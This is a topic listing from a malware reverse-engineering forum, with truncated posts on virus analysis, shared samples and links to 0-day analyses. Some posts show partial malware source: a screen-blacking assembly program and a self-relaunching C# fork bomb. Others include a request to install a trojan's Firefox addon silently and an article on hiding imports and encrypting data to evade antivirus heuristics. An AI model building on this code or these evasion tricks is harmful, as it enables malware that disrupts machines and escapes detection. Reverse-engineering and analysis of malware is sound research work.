Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
360 topics in this forum
-
Dual OS Virus
by cyb3rl0rd1867 - 5 replies
- 5.5k views
I recently heard about the W32/Simile virus that was dangerous for both Linux and Windows. More info here. I was curious to know what the header of such a file would look like, since Microsoft uses PE headers and Linux uses ELF headers. How would it be possible to make it compatible with both?
-
Malware+Custom Obfusc+No detections
by chickenbutt - 4 replies
- 6.1k views
I didn't look to see what this does, beyond dropping binaries and making services. It has to be rebuilt to load in Olly (the dropped binaries). KIS 2010, NIS 2010, Avira 2010 didn't detect it with high heuristics. It's all ring 3. dfgdfgdgdgf.zip
-
W32.BlackOut
by JMC31337 - 0 replies
- 6.1k views
black out the GUI
.386
.model flat
extrn MessageBoxA:proc
extrn GetDC:proc
extrn SetPixel:proc
extrn GetSystemMetrics:proc
extrn MessageBoxA:proc
extrn GetPixel:PROC
extrn BitBlt:PROC
.data
xc dd 0 ;width
yc dd 0 ;height
x dd 0 ;x-co
y dd 0 ;y-co
dc dd 0
.code
start:
xor eax,eax
push eax
call GetDC
mov dword ptr dc,eax
push 16
call GetSystemMetrics
mov dword ptr xc,eax
push 17
call GetSystemMetri…
-
Netsky B
by JMC31337 - 3 replies
- 4.2k views
...
-
Flash / PDF 0day Analysis
by frank_boldewin - 5 replies
- 4k views
http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/ Sebastian and I worked on that for the last 2 days. Maybe someone is interested. Cheers, Frank
-
C# Rabbit / Fork Bomb
by JMC31337 - 0 replies
- 6.3k views
//JMC31337
//THE MAIN FORM CODE
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Diagnostics;

namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            string startpointPath = Application.ExecutablePath;
            for (int x = 0; x < 999999999; x++)
            {
                MessageBox.Show("RABBIT", "Attention");
                Process.Sta…
-
Silent Firefox addon install
by Minister - 1 reply
- 3.5k views
Good day, I am creating a small trojan and encountered one problem. The trojan installs an addon for FF, and the problem is that FF notifies the user about it, spitting out a window with "New addons installed". Any ideas how to bypass it, at least a hint, please? I've googled it and searched in Mozilla support forums, but for obvious reasons, nobody is keen on answering it.
-
Explore the Vulnerability in the following snippets - Help Required
by mystery_reverser - 5 replies
- 5.9k views
Hello guys, I am a newbie to reverse engineering vulnerabilities. Following are some vulnerable code samples, for which I want to know the answers to the following questions. It would be great if you guys explained elaborately so that I can kick-start my vulnerability analysis with a bang. Please help me out, guys. You can mail me the answers at mysteryreverse@gmail.com or post them here as a doc file. Regards, Mystery. Here is the doc file!! Vulnerablitity.zip Vulnerablitity.doc
-
WINDAZ, sLOTz, FALAFEL, KSCRACKiNG
by Aguila - 3 replies
- 5.6k views
Some guy is spreading his bot via scene releases.
Mirc.v7.0.Incl.Keymaker-WiNDAZ
Nero.v9.9.4.26.0b.Incl.Keymaker-WiNDAZ
ESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ
JESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ
Avast.Internet.Security.v5.0.545.Incl.Keymaker-WiNDAZ
Jules.v2.0.Cracked-sLOTz
Eastern.Slots.v3.0.Cracked-sLOTz
Cortez.Treasure.v1.0.Cracked-sLOTz
Kaspersky.Keygen.V1.WORKiNG.WiNALL-KSCRACKiNG
WINX.HD.CAMCORDER.VIDEO.CONVERTER.V3.0-FALAFEL
FRESH.VIEW.V7.94.READ.NFO-FALAFEL
FRESH.DOWNLOAD.V8.48.READ.NFO-FALAFEL
........
Let's analyze his "work".
idx.exe -> Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - Overlay : 2F7C5C...
Nothing discov…
-
Spyware and or adware ?
by iamlegend - 2 replies
- 3.4k views
Hey guys, I know this is maybe not software, but by any chance, do you have an example of a spyware or adware script? Or maybe a site or something out there that has these threats? I need one or two for my research, like AdWare.Win32.Virtumonde or AdWare.Win32.Dm.vv. Thanks in advance.
-
HTML CRYPTO TROJAN
by JMC31337 - 0 replies
- 3.4k views
...
-
Interesting Stuff
by cyb3rl0rd1867 - 5 replies
- 6.6k views
Here are some interesting samples I came across while disinfecting someone's machine. Let me know if you come across something interesting! Kaspersky name: Trojan.win32.scar.bzuz Password: tuts4you syre32.rar
-
- 5 replies
- 4.4k views
An overview with some examples, written by ir3t from Black Storm. Who said girls can't code!!? http://portal.b-at-s.info/download.php?view.454
-
C# Replicator
by JMC31337 - 0 replies
- 4.1k views
... moved to vxheavens
-
Mytob@MM
by JMC31337 - 0 replies
- 3.1k views
...
-
W32 DLL Virii
by JMC31337 - 0 replies
- 8.5k views
...
-
CardPay Ransomware
by JMC31337 - 0 replies
- 3.1k views
...
-
Conficker Worm
by JMC31337 - 0 replies
- 7.7k views
...
-
Icelords BIOS ROOTKIT
by JMC31337 - 0 replies
- 3.4k views
...
-
Storm Worm
by JMC31337 - 0 replies
- 3.2k views
...
-
MYDOOM WORMS
by JMC31337 - 0 replies
- 3.3k views
...
-
W32/Sharp-A
by Programmdude - 0 replies
- 3.4k views
Hey, I was wondering if anyone had a copy of W32/Sharp-A. I would like it for researching it. http://www.sophos.com/security/analyses/viruses-and-spyware/w32sharpa.html
-
Reversinglabs - NyxEngine
by Loki - 0 replies
- 3.6k views
More nice work from ap0x and deroko. http://blog.reversinglabs.com/2010/04/introducing-nyxengine/
-
Clever tricks against antiviruses...
by Teddy Rogers - 2 replies
- 3.7k views
I bet you have come across some software you’ve made which you didn’t want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section. Anti-viruses rely heavily on their heuristics if all other (signature) scans fail. The patterns they search for in your executable are the functions being imported and the order in which they are called. No imports! Having no import table is relatively easy. There are, however, some functions I haven’t imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are: Get the kernel32 module base address. (…
-
Excellent video
by cyb3rl0rd1867 - 5 replies
- 10.2k views
Here's an excellent video on malware removal by Mark Russinovich, author of many tools in the Sysinternals suite. Very good for semi-beginners in the world of malware exploration and analysis.